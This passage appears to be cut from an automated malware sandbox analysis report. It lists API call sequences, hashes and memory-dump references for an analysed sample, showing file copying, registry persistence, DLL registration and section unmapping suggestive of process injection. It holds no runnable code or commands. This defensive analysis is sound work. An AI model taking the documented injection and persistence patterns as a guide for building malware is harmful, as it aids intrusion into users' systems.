    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: GetLastError$CloseHandleFlushFileBuffersSetEndOfFile
  • String ID:
